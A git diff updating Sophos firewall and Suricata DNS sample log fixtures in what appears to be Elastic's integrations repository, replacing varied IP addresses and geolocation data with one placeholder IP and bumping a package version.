"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL", - "host": "89.68.140.204", + "host": "175.16.199.1", "responsetime": 11199, "querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com", "message_id": "17071", @@ -8306,7 +8628,7 @@ }, "client": { "bytes": 1419, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "http": { "request": { @@ -8316,8 +8638,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566578200Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", + "ingested": "2021-12-09T13:44:55.715749Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", "code": "075000617071", "kind": "alert", "action": "denied", @@ -8337,54 +8659,52 @@ { "server": { "bytes": 1357, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 200, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-22", - "city_name": "Gdynia", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Pomerania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 18.5403, - "lat": 54.5055 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 6830, + "number": 4837, "organization": { - "name": "Liberty Global B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1774, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "url": { "full": "/mapi/nspi/" @@ -8407,8 +8727,7 @@ "defaulttest.local" ], "ip": [ - "89.68.140.204", - "185.8.209.207" + "175.16.199.1" ] }, "sophos": { @@ -8423,7 +8742,7 @@ "contenttype": "application/mapi-http", "device_name": "XG230", "log_type": "WAF", - "host": "89.68.140.204", + "host": "175.16.199.1", "responsetime": 14086, "device": "SFW" } @@ -8433,7 +8752,7 @@ }, "client": { "bytes": 1774, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "http": { "request": { @@ -8443,8 +8762,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566583300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", + "ingested": "2021-12-09T13:44:55.715753100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", "code": "075000617071", "kind": "alert", "action": "denied", @@ -8540,7 +8859,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566588500Z", + "ingested": "2021-12-09T13:44:55.715757900Z", "original": "device=\"SFW\" date=2020-05-19 time=17:20:29 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/ querystring= cookie=\"-\" referer=- method=GET httpstatus=403 reason=\"Static URL Hardening\" extra=\"No signature found\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3", "code": "075000617071", "kind": "alert", @@ -8640,7 +8959,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566594800Z", + "ingested": "2021-12-09T13:44:55.715763800Z", "original": "device=\"SFW\" date=2020-05-19 time=18:03:30 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/download/eicarcom2.zip querystring= cookie=\"; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*\" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason=\"Antivirus\" extra=\"EICAR-AV-Test\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6", "code": "075000617071", "kind": "alert", @@ -8662,51 +8981,52 @@ { "server": { "bytes": 5353, - "ip": "216.167.51.72" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 2914, + "number": 4837, "organization": { - "name": "NTT America, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 403, - "ip": "216.167.51.72" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "RO-B", - "city_name": "Bucharest", - "country_iso_code": "RO", - "country_name": "Romania", - "region_name": "Bucuresti", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 26.1708, - "lat": 44.4176 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 295, - "ip": "83.97.20.30" + "ip": "175.16.199.1" }, "url": { "full": "/" @@ -8729,8 +9049,7 @@ "defaulttest.local" ], "ip": [ - "83.97.20.30", - "216.167.51.72" + "175.16.199.1" ] }, "sophos": { @@ -8741,7 +9060,7 @@ "log_type": "WAF", "log_component": "Web Application Firewall", "extra": "Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header", - "host": "83.97.20.30", + "host": "175.16.199.1", "responsetime": 608, "message_id": "17071", "priority": "Information", @@ -8754,7 +9073,7 @@ }, "client": { "bytes": 295, - "ip": "83.97.20.30" + "ip": "175.16.199.1" }, "http": { "request": { @@ -8764,8 +9083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566602100Z", - "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", + "ingested": "2021-12-09T13:44:55.715769700Z", + "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", "code": "075000617071", "kind": "alert", "action": "denied", @@ -8818,7 +9137,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566609400Z", + "ingested": "2021-12-09T13:44:55.715775600Z", "original": "device=\"SFW\" date=2017-02-01 time=14:17:35 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=2", "code": "106025618011", "kind": "event", @@ -8866,7 +9185,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566616600Z", + "ingested": "2021-12-09T13:44:55.715780600Z", "original": "device=\"SFW\" date=2017-02-01 time=14:19:47 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=3", "code": "106025618011", "kind": "event", diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index 3bd432f7cde..fe077a08a6c 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sophos title: Sophos Logs -version: 1.1.0 +version: 1.1.1 description: Collect and parse logs from Sophos Products with Elastic Agent. categories: ["security"] release: ga diff --git a/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson b/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson index 4f625ae98f8..9f38719e12d 100644 --- a/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson +++ b/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson @@ -1,24 +1,24 @@ {"timestamp":"2019-08-22T23:48:27.924120+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":46686,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51803,"rrname":"google.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:27.924282+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":36993,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39523,"rrname":"google.com","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2607:f8b0:4006:0805:0000:0000:0000:200e"}],"grouped":{"AAAA":["2607:f8b0:4006:0805:0000:0000:0000:200e"]}}} -{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"172.217.11.46"}],"grouped":{"A":["172.217.11.46"]}}} +{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"]}}} +{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1"]}}} {"timestamp":"2019-08-22T23:48:48.839495+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":50720,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60273,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:48.839714+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":41979,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4210,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"}],"grouped":{"A":["151.101.130.217","151.101.194.217","151.101.2.217","151.101.66.217"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} -{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a04:4e42:0600:0000:0000:0000:0000:0729","2a04:4e42:0000:0000:0000:0000:0000:0729","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} +{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1","175.16.199.1","175.16.199.1","175.16.199.1"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} +{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} {"timestamp":"2019-08-23T01:22:31.812655+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":44773,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28329,"rrname":"www.yahoo.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.812828+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":55246,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7050,"rrname":"www.yahoo.com","rrtype":"AAAA","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1315,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.232"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.231"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.10"}} -{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.9"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} +{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}} {"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1268,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}} 